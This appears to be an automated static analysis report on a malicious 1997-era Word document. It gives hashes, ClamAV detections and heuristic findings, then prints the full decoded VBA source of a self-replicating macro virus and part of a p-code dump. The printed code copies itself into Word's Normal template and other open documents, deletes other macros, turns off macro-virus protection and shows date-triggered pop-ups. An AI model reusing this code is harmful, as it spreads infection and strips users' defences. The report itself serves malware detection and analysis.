Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 693a6cc3a2096692…

MALICIOUS

Office (OLE)

77.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b586feb8bb2cdc37ef0af17986815f68 SHA-1: b63f7e1a7f5266f74d39e24d841575e38d6ad8d7 SHA-256: 693a6cc3a20966922978e27ff8b75c5aa3d780ca74f10556000b94410fee4e4d
256 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is identified as malicious by ClamAV with multiple critical detections, including 'Doc.Trojan.Mamm-1' and 'Doc.Trojan.Titasic-7'. It contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close functions, indicating an attempt to execute malicious code upon opening or closing the document. The VBA macro 'Angelina' appears to be designed to copy itself and potentially establish persistence or download further payloads, though its exact functionality is obfuscated.

Heuristics 6

  • ClamAV: Doc.Trojan.Mamm-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Mamm-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    AutoOpen
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 48487 bytes
SHA-256: b33b06d8c1454b1bf49df9f740132bbb9bf705b67619cdc66bcfb926bb20257a
Detection
ClamAV: Doc.Trojan.Titasic-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Angelina"



Public AD As Object, aDes As Variant, btk As String
Public NonVoldina As Boolean, afound As Boolean, hapus As Boolean, reset As Boolean, aExc As Boolean, DocCount As Boolean
Function AstMaster()
Dim nmak(1) As String
Dim NT As Object
Dim aSrc$
On Error GoTo selesai
nmak(0) = "Angelina"
nmak(1) = "Voldina"

aSrc = MacroContainer
Set NT = NormalTemplate
If Not DocCount Then
Set AD = ActiveDocument
ElseIf aSrc <> "SNrml.dot" Then
aSrc = NT
End If

If aSrc = NT Then
aSrc = NT.FullName: Set aDes = AD
ElseIf aSrc = AD Then
aSrc = AD.FullName: Set aDes = NT
ElseIf aSrc = "SNrml.dot" Then
Set aDes = NT
aSrc = Options.DefaultFilePath(8) & "\SNrml.src"
End If

Mhapus aDes
With aDes.VBProject
If Not (Not hapus And .Description = "Angelina" And .VBComponents.Count > 2) Then
    Mcopy aSrc, aDes, nmak
    hapus = False
    .Description = "Angelina"
    If aDes = NT Then
        Options.SaveInterval = 1
        CustomizationContext = NT
        CommandBars("Tools").reset
        KeyBindings.Add KeyCode:=BuildKeyCode(77, 1024), KeyCategory:=1, _
        Command:="ToolsRecordMacroStart"
        aDes.Save
    End If
    CommandBars("Macro").Controls(2).OnAction = "ViewVbCode"
Else
GoTo Aksi
End If
End With
If afound = True Then Exit Function
Refresh
On Error Resume Next
Aksi:
If aExc = True Then Exit Function
Exit Function
selesai:
If Err.Number = 50289 Then MsgBox "Terimakasih Anda Telah" & Chr(13) & "Memproteksi Word dengan Aman", vbInformation, "Voldina Anti virus"
End Function

Sub Mhapus(Sfile)
Dim nmak As Object
For Each nmak In Sfile.VBProject.VBComponents
    If nmak.Name = "NewMacros" Then NonVoldina = True
    If nmak.Name <> "ThisDocument" And nmak.Name <> "NewMacros" _
    And nmak.Name <> "Angelina" And nmak.Name <> "Voldina" Then
        hapus = True
        If reset Then
        Application.OrganizerDelete Sfile.FullName, nmak.Name, 3
        Else
        nmak.CodeModule.DeleteLines 1, nmak.CodeModule.CountOfLines
        End If
    End If
Next nmak
End Sub
Sub Mcopy(Sfile, Dfile, nmak)
Dim aNmak
For Each aNmak In nmak
Application.OrganizerCopy Sfile, Dfile.FullName, aNmak, 3
Next
End Sub
Sub Action()
Attribute Action.VB_Description = "Jangan Ngawur Yaa.. Suniel"
Attribute Action.VB_ProcData.VB_Invoke_Func = "Normal.Angelina.Action"
Documents.Add
On Error Resume Next
With ActiveWindow
.Caption = "Voldina"
.ActivePane.View.Zoom.Percentage = 100
.View.FullScreen = Not .View.FullScreen
.DisplayRulers = False
.DisplayHorizontalScrollBar = False
.DisplayVerticalRuler = False
.DisplayVerticalScrollBar = False
.View.ShowTextBoundaries = False
    CommandBars("Full Screen").Position = 1
    With CommandBars("Full Screen").Controls(1)
    .Caption = "Voldina ," & "  " & Date
    .Style = 3
    .FaceId = 281
    End With
.View.Type = 6
Randomize
With ActiveDocument.Background.Fill
    .Visible = True
    .PresetGradient Int((6 - 1 + 1) * Rnd + 1), 1, Int((24 - 1 + 1) * Rnd + 1)
End With
btk = 1
Voldina.Show
.View.FullScreen = Not .View.FullScreen
End With
CommandBars("Full Screen").reset
WBT
ActiveDocument.Close 0
WBF
End Sub
Sub FileOpen()
If Day(Now) = 16 Then
   btk = 2
   Voldina.Show
ElseIf (Day(Now) = 16) And (Month(Now) = 1) Then
   btk = 2
   Voldina.Show
Else
End If
WBT
If Dialogs(80).Show <> 0 Then
WBF
AutoOpen
Else
WBF
End If
End Sub

Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
AstMaster
If Documents.Count > 1 Then
    For i = 1 To Documents.Count
    If Documents(i).Name <> ActiveDocument.Name Then
    Set AD = Documents(i)
    DocCount = True
    hapus = False
    AstMaster
    End If
    Next
End If
If Now > DateSerial(1998, 9, 10) Then Application.OnTime When:=Now + TimeValue("00:45:00"), Name:="Angelina.Action"
End
End Sub
Sub ViewVBCode()
If MsgBox("Maaf.." & Chr(13) & "Ente Jangan Sock pintar untuk mengubahnya " & Chr(13) & Chr(13) _
& "Untuk info klik saja HELP - About Microsoft Word " & Chr(13) & Chr(13) _
& " Apakah Anda ingin merekam makro..?", vbExclamation + vbYesNo, "Voldina Anti Virus") _
= vbYes Then
    SendKeys "%m%s{down}~%d'Macro non-Voldina'%m"
Else
Action
End If
End Sub
Sub AutoExec()
On Error Resume Next
If MacroContainer <> NormalTemplate Then
aExc = True
AstMaster
WBT
AddIns.Unload False
WBF
End If
Application.EnableCancelKey = wdCancelDisabled
End Sub
Sub AutoExit()
Dim aAddin As Object
On Error GoTo batal
WBT
If Documents.Count <> 0 Then Documents.Close
Options.DefaultFilePath(2) = Options.DefaultFilePath(6)
afound = True
For Each aAddin In AddIns
    If aAddin.Name = "SNrml.dot" Then afound = False
Next aAddin
        
If afound = True Then
Application.Visible = False
Documents.Add
AstMaster
    With ActiveDocument
        .SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.src", FileFormat:=wdFormatDocument, AddToRecentFiles:=False
        .SaveAs FileName:=Options.DefaultFilePath(8) & "\SNrml.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False
    End With
End If
Application.Quit
batal:
WBF
End Sub
Sub HelpAbout()
    On Error GoTo voldna
    btk = 3
    Voldina.Show
voldna:
End Sub
Sub FileClose()
If Day(Now) = 16 Then
   btk = 2
   Voldina.Show
ElseIf (Day(Now) = 16) And (Month(Now) = 1) Then
   btk = 2
   Voldina.Show
Else
End If
End Sub
Sub ToolsMacro()
WBF
On Error GoTo batal
Mhapus ActiveDocument
If NonVoldina Then
    If MacroContainer = ActiveDocument Then Application.Run NormalTemplate.VBProject.Name & ".Angelina.ToolsMacro": Exit Sub
    Application.DisplayAlerts = 0
        With Dialogs(215)
        .Description = "Macros Voldina mungkin tidak bisa Anda hapus, Anda hanya bisa menghapus makro buatan Anda (Descr: 'Makro non-Voldina')"
        If .Display = 1 Then .Execute
        End With
    Application.DisplayAlerts = -1
Else
ViewVBCode
End If
batal:
End Sub
Sub FileTemplates()
WBF
If Not reset Then Dialogs(87).Display
End Sub
Sub FormatStyle()
WBF
Dialogs(180).Show
End Sub
Function Refresh()
reset = True
FileTemplates
Mhapus aDes
End Function
Sub AutoClose()
Application.DisplayAlerts = -1
With Options
.SaveNormalPrompt = False
.SaveInterval = 10
.VirusProtection = False
End With
If ActiveWindow.Caption <> "Voldina" And InStr(1, ActiveDocument.Name, "Docume", 1) = 0 _
And ActiveDocument.Name <> "SNrml.dot" Then AstMaster
End Sub
Sub FileExit()
If Day(Now) = 16 Then
   btk = 2
   Voldina.Show
ElseIf (Day(Now) = 16) And (Month(Now) = 1) Then
   btk = 2
   Voldina.Show
Else
End If
AutoExit
End Sub
Sub ToolsOptions()
Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
Dialogs(wdDialogToolsOptions).Show
Options.DefaultFilePath(wdUserTemplatesPath) = Application.Path
End Sub
Function WBT()
WordBasic.DisableAutoMacros True
End Function
Function WBF()
WordBasic.DisableAutoMacros False
End Function











'This macros created & inspirated
'when my specials friends
'celebrate her birthday
' January 16, 1999

'This is special gift for you
'######################################
' I HOPE YOU REMEMBER FOR ME
' EVEN YOU HAPPY WITH OTHERS
' NEW FRIENDS
'                        ....fhrazzthy
'######################################
'fhrazzthy@most-wanted.com








Attribute VB_Name = "Voldina"
Attribute VB_Base = "0{F1B609E2-AD7E-11D3-ACDB-900936D3B526}{F1B609D6-AD7E-11D3-ACDB-900936D3B526}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False













































Dim Teks(6) As String
Private Sub CommandButton1_Click()
Do
    With Voldina
    .Height = .Height - 10
    .Width = .Width - 15
    If .Height < 25 Then Exit Do
    End With
    Beep
Loop
Unload Me
End Sub

Private Sub CommandButton2_Click()
Do
    With Voldina
    .Height = .Height - 10
    .Width = .Width - 15
    If .Height < 25 Then Exit Do
    End With
    Beep
Loop
Unload Me
btk = 3
Voldina.Show
End Sub



Private Sub Image6_Click()

End Sub

Private Sub UserForm_Activate()
If btk = 2 Then
    Ulang
ElseIf btk = 1 Then
    TT
ElseIf btk = 3 Then
    Wly
Else
End If
End Sub
Sub Wly()
With Voldina
    .Width = Width - 200
    .Caption = "F.h.r.a.z.z.t.h.y"
    .StartUpPosition = 1
End With
Image1.Visible = False
Image3.Visible = True
Image4.Visible = True
Image5.Visible = False
Image6.Visible = True
Label8.Visible = False
Label4.Visible = False
Label9.Visible = True
Label7.Visible = True

CommandButton2.Visible = False

End Sub
Sub TT()
Dim a As Byte, diam As Boolean
Dim tp&, tm!, sel!, i%

Image3.Visible = False
Image4.Visible = False
Image6.Visible = False
Label9.Visible = False
Image6.Visible = False
Label7.Visible = False
Image5.Visible = False
Label8.Visible = False

a = 1
diam = True
Voldina.Enabled = False
Label3.Visible = False
Do
    DoEvents
    sel = Timer - tm
    tp = tp + 1
    If tp Mod 300 = 0 Then
    Label4.ForeColor = Voldina.BackColor
    End If
    If tp Mod 600 = 0 Then
    Label4.ForeColor = &H80000009
End If
    If sel > 0.1 Then
        tm = Timer
        i = i + 1
        If a = 7 Then Label1.Font.Size = 16: Label1.Width = Image1.Width
        Label1.Caption = Label1.Caption & Mid(Teks(a), i, 1)
        If Mid(Teks(a), i, 1) Like "[! ]" Then Beep
            If Len(Label1.Caption) = Len(Teks(a)) Then
                If diam Then
                    Do
                    If Timer - tm > 1 Then Exit Do
                    DoEvents
                    Label4.ForeColor = Voldina.BackColor
                    Loop
                    diam = False
                    If a = 7 Then GoTo catat
                End If
            Label2.Move Label2.Left - 9
            If Label2.Left <= Label1.Left Then GoSub catat
        End If
    End If
Loop
Exit Sub
catat:
If a <> 7 Then Label1.Caption = ""
tm = Timer
Label2.Left = Label1.Left + Label1.Width
a = a + 1
i = 0
diam = True
        If a = 7 Then
            Label4.Visible = True
            Image1.Visible = True
            Voldina.Enabled = True
            Label3.Visible = True
            CommandButton1.SetFocus
            Image1.Picture = LoadPicture(System.PrivateProfileString("", _
            "HKEY_CURRENT_USER\Control Panel\desktop", "Wallpaper"))
            Exit Sub
        End If
Return
End Sub





Private Sub UserForm_Layout()
Dim waktu%, saat$
waktu = Val(Format(Time, "hh"))
Select Case waktu
Case 0 To 8
saat = "pagi"
Case 9 To 14
saat = "siang"
Case 15 To 17
saat = "sore"
Case 18 To 23
saat = "malam"
Case Else
Label4.Visible = False
End Select

Teks(1) = "Mas Yudi sayangku maaf bila hal ini akan mengganggumu "
Teks(2) = "Karena hanya dengan inilah dinda mengingatkan akan wajahku yang manis ini"
Teks(3) = "S'bab kutahu  kalau kamu sering lirik sana-sini"
Teks(4) = "Tapi akoe sangat maklum akan tugasmu ini penuh dengan SLI"
Teks(5) = "Yang Kumau agar kamu S'lalu ingat akan cantiknya parasku"
Teks(6) = "Salam sayang dariku hanya untukmu seorang"
Label2.Left = Label1.Left + Label1.Width
Label3.Caption = "Hacked by : Fhrazzthy '96" & Chr(13) & Chr(13) & "Thanks to : " & Chr(13) & Application.UserName
Label4.Caption = "Selamat " & saat & Chr(13) & "Maaf bila " & Application.UserName & " merasa terganggu"
End Sub
Private Sub UserForm_Terminate()
    Dim i As Integer
    For i = 1 To 10
        Beep
    Next
End Sub
Sub Ulang()
Dim waktu%, bln$, kt$
With Voldina
    .Width = Width - 200
    .Caption = "Happy Birthday"
    .StartUpPosition = 1
End With
Image1.Visible = False
Image2.Visible = False
Image3.Visible = False
Image4.Visible = False
Image6.Visible = False
Label4.Visible = False
Label9.Visible = False
Label7.Visible = False

CommandButton2.Visible = False

Image5.Visible = True
Label8.Visible = True

kt = Val(Format(Date, "mm"))
Select Case kt
Case 2: bln = "sebulan yang lalu"
Case 3: bln = "2 bulan yang lewat"
Case 4: bln = "3 bulan yang lalu"
Case 5: bln = "4 bulan kemarin"
Case 6: bln = "5 bulan lalu"
Case 7: bln = "setengah tahun lagi"
Case 8: bln = "5 bulan kedepan"
Case 9: bln = "4 bulan mendatang"
Case 10: bln = "3 bulan lagi"
Case 11: bln = "tinggal 2 bulan lagi"
Case 12: bln = "sebulan lagi"
End Select
If Day(Now) = 16 And Month(Now) = 1 Then
   Image5.Visible = True
   Label8.Visible = False
   With Voldina
    .Caption = "Happy Birthday Dhien"
   End With
ElseIf Day(Now) = 16 Then
   With Voldina
    .Caption = "Pesan From Fhrazzthy"
   End With
   Image5.Visible = False
   Label8.Visible = True
   Label8.Caption = "!! INGAT !!" & Chr(13) & bln & Chr(13) & _
                 "Voldina ulang tahun"
Else
With Voldina
    .Caption = "Pesan From Fhrazzthy"
   End With
Image5.Visible = False
Label8.Visible = True
Label8.Caption = "!! INGAT !!" & Chr(13) & bln & Chr(13) & _
                 "Voldina ulang tahun"

End If
End Sub



' Processing file: /tmp/qstore_meyd0_5w
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Angelina - 15001 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' 	Dim (Public) 
' 	VarDefn AD (As Object)
' 	VarDefn aDes (As Variant)
' 	VarDefn btk (As String)
' Line #4:
' 	Dim (Public) 
' 	VarDefn NonVoldina (As Boolean)
' 	VarDefn afound (As Boolean)
' 	VarDefn hapus (As Boolean)
' 	VarDefn reset (As Boolean)
' 	VarDefn aExc (As Boolean)
' 	VarDefn DocCount (As Boolean)
' Line #5:
' 	FuncDefn (Function AstMaster())
' Line #6:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0001 
' 	VarDefn nmak (As String)
' Line #7:
' 	Dim 
' 	VarDefn NT (As Object)
' Line #8:
' 	Dim 
' 	VarDefn aSrc
' Line #9:
' 	OnError selesai 
' Line #10:
' 	LitStr 0x0008 "Angelina"
' 	LitDI2 0x0000 
' 	ArgsSt nmak 0x0001 
' Line #11:
' 	LitStr 0x0007 "Voldina"
' 	LitDI2 0x0001 
' 	ArgsSt nmak 0x0001 
' Line #12:
' Line #13:
' 	Ld MacroContainer 
' 	St aSrc 
' Line #14:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set NT 
' Line #15:
' 	Ld DocCount 
' 	Not 
' 	IfBlock 
' Line #16:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set AD 
' Line #17:
' 	Ld aSrc 
' 	LitStr 0x0009 "SNrml.dot"
' 	Ne 
' 	ElseIfBlock 
' Line #18:
' 	Ld NT 
' 	St aSrc 
' Line #19:
' 	EndIfBlock 
' Line #20:
' Line #21:
' 	Ld aSrc 
' 	Ld NT 
' 	Eq 
' 	IfBlock 
' Line #22:
' 	Ld NT 
' 	MemLd FullName 
' 	St aSrc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld AD 
' 	Set aDes 
' Line #23:
' 	Ld aSrc 
' 	Ld AD 
' 	Eq 
' 	ElseIfBlock 
' Line #24:
' 	Ld AD 
' 	MemLd FullName 
' 	St aSrc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NT 
' 	Set aDes 
' Line #25:
' 	Ld aSrc 
' 	LitStr 0x0009 "SNrml.dot"
' 	Eq 
' 	ElseIfBlock 
' Line #26:
' 	SetStmt 
' 	Ld NT 
' 	Set aDes 
' Line #27:
' 	LitDI2 0x0008 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	LitStr 0x000A "\SNrml.src"
' 	Concat 
' 	St aSrc 
' Line #28:
' 	EndIfBlock 
' Line #29:
' Line #30:
' 	Ld aDes 
' 	ArgsCall Mhapus 0x0001 
' Line #31:
' 	StartWithExpr 
' 	Ld aDes 
' 	MemLd VBProject 
' 	With 
' Line #32:
' 	Ld hapus 
' 	Not 
' 	MemLdWith Description 
' 	LitStr 0x0008 "Angelina"
' 	Eq 
' 	And 
' 	MemLdWith VBComponents 
' 	MemLd Count 
' 	LitDI2 0x0002 
' 	Gt 
' 	And 
' 	Paren 
' 	Not 
' 	IfBlock 
' Line #33:
' 	Ld aSrc 
' 	Ld aDes 
' 	Ld nmak 
' 	ArgsCall Mcopy 0x0003 
' Line #34:
' 	LitVarSpecial (False)
' 	St hapus 
' Line #35:
' 	LitStr 0x0008 "Angelina"
' 	MemStWith Description 
' Line #36:
' 	Ld aDes 
' 	Ld NT 
' 	Eq 
' 	IfBlock 
' Line #37:
' 	LitDI2 0x0001 
' 	Ld Options 
' 	MemSt SaveInterval 
' Line #38:
' 	Ld NT 
' 	St CustomizationContext 
' Line #39:
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemCall reset 0x0000 
' Line #40:
' 	LineCont 0x0004 10 00 08 00
' 	LitDI2 0x004D 
' 	LitDI2 0x0400 
' 	ArgsLd BuildKeyCode 0x0002 
' 	ParamNamed KeyCode 
' 	LitDI2 0x0001 
' 	ParamNamed KeyCategory 
' 	LitStr 0x0015 "ToolsRecordMacroStart"
' 	ParamNamed Command 
' 	Ld KeyBindings 
' 	ArgsMemCall Add 0x0003 
' Line #41:
' 	Ld aDes 
' 	ArgsMemCall Save 0x0000 
' Line #42:
' 	EndIfBlock 
' Line #43:
' 	LitStr 0x000A "ViewVbCode"
' 	LitDI2 0x0002 
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt OnAction 
' Line #44:
' 	ElseBlock 
' Line #45:
' 	GoTo Aksi 
' Line #46:
' 	EndIfBlock 
' Line #47:
' 	EndWith 
' Line #48:
' 	Ld afound 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #49:
' 	ArgsCall Refresh 0x0000 
' Line #50:
' 	OnError (Resume Next) 
' Line #51:
' 	Label Aksi 
' Line #52:
' 	Ld aExc 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitFunc 
' 	EndIf 
' Line #53:
' 	ExitFunc 
' Line #54:
' 	Label selesai 
' Line #55:
' 	Ld Err 
' 	MemLd Number 
' 	LitDI4 0xC471 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0016 "Terimakasih Anda Telah"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x001C "Memproteksi Word dengan Aman"
' 	Concat 
' 	Ld vbInformation 
' 	LitStr 0x0012 "Voldina Anti virus"
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #56:
' 	EndFunc 
' Line #57:
' Line #58:
' 	FuncDefn (Sub Mhapus(Sfile))
' Line #59:
' 	Dim 
' 	VarDefn nmak (As Object)
' Line #60:
' 	StartForVariable 
' 	Ld nmak 
' 	EndForVariable 
' 	Ld Sfile 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #61:
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0009 "NewMacros"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NonVoldina 
' 	EndIf 
' Line #62:
' 	LineCont 0x0004 0C 00 04 00
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x000C "ThisDocument"
' 	Ne 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0009 "NewMacros"
' 	Ne 
' 	And 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0008 "Angelina"
' 	Ne 
' 	And 
' 	Ld nmak 
' 	MemLd New 
' 	LitStr 0x0007 "Voldina"
' 	Ne 
' 	And 
' 	IfBlock 
' Line #63:
' 	LitVarSpecial (True)
' 	St hapus 
' Line #64:
' 	Ld reset 
' 	IfBlock 
' Line #65:
' 	Ld Sfile 
' 	MemLd FullName 
' 	Ld nmak 
' 	MemLd New 
' 	LitDI2 0x0003 
' 	Ld Application 
' 	ArgsMemCall OrganizerDelete 0x0003 
' Line #66:
' 	ElseBlock 
' Line #67:
' 	LitDI2 0x0001 
' 	Ld nmak 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld nmak 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #68:
' 	EndIfBlock 
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	StartForVariable 
' 	Ld nmak 
' 	EndForVariable 
' 	NextVar 
' Line #71:
' 	EndSub 
' Line #72:
' 	FuncDefn (Sub Mcopy(Sfile, Dfile, nmak))
' Line #73:
' 	Dim 
' 	VarDefn aNmak
' Line #74:
' 	StartForVariable 
' 	Ld aNmak 
' 	EndForVariable 
' 	Ld nmak 
' 	ForEach 
' Line #75:
' 	Ld Sfile 
' 	Ld Dfile 
' 	MemLd FullName 
' 	Ld aNmak 
' 	LitDI2 0x0003 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #76:
' 	StartForVariable 
' 	Next 
' Line #77:
' 	EndSub 
' Line #78:
' 	FuncDefn (Sub Action())
' Line #79:
' 	Ld Documents 
' 	ArgsMemCall Add 0x0000 
' Line #80:
' 	OnError (Resume Next) 
' Line #81:
' 	StartWithExpr 
' 	Ld ActiveWindow 
' 	With 
' Line #82:
' 	LitStr 0x0007 "Voldina"
' 	MemStWith Caption 
' Line #83:
' 	LitDI2 0x0064 
' 	MemLdWith ActivePane 
' 	MemLd View 
' 	MemLd Zoom 
' 	MemSt Percentage 
' Line #84:
' 	MemLdWith View 
' 	MemLd FullScreen 
' 	Not 
' 	MemLdWith View 
' 	MemSt FullScreen 
' Line #85:
' 	LitVarSpecial (False)
' 	MemStWith DisplayRulers 
' Line #86:
' 	LitVarSpecial (False)
' 	MemStWith DisplayHorizontalScrollBar 
' Line #87:
' 	LitVarSpecial (False)
' 	MemStWith DisplayVerticalRuler 
' Line #88:
' 	LitVarSpecial (False)
' 	MemStWith DisplayVerticalScrollBar 
' Line #89:
' 	LitVarSpecial (False)
' 	MemLdWith View 
' 	MemSt ShowTextBoundaries 
' Line #90:
' 	LitDI2 0x0001 
' 	LitStr 0x000B "Full Screen"
' 	ArgsLd CommandBars 0x0001 
' 	MemSt Position 
' Line #91:
' 	StartWithExpr 
' 	LitDI2 0x0001 
' 	LitStr 0x000B "Full Screen"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	With 
' Line #92:
' 	LitStr 0x0009 "Voldina ,"
' 	LitStr 0x0002 "  "
…